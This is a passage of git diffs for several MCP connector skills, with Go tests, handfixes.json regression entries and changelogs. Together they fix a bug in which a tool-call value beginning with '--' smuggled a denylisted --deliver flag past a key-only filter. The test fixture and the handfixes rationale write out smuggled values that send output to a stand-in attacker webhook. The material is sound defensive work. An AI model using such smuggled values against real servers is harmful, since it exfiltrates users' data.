 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/datto-rmm/handfixes.json
+++ b/skills/datto-rmm/handfixes.json
@@ -210,6 +210,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/datto-rmm/handfixes.json
+++ b/skills/datto-rmm/handfixes.json
@@ -225,8 +225,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -236,7 +248,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/domotz/CHANGELOG.md
+++ b/skills/domotz/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/domotz/CHANGELOG.md
+++ b/skills/domotz/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/domotz/CHANGELOG.md
+++ b/skills/domotz/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/domotz/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/domotz/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/domotz/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/domotz/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/domotz/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/domotz/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/domotz/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/domotz/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/domotz/handfixes.json
+++ b/skills/domotz/handfixes.json
@@ -177,6 +177,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/domotz/handfixes.json
+++ b/skills/domotz/handfixes.json
@@ -192,8 +192,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -203,7 +215,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/gradient/CHANGELOG.md
+++ b/skills/gradient/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/gradient/CHANGELOG.md
+++ b/skills/gradient/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/gradient/CHANGELOG.md
+++ b/skills/gradient/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/gradient/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/gradient/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/gradient/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/gradient/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/gradient/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/gradient/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/gradient/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/gradient/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
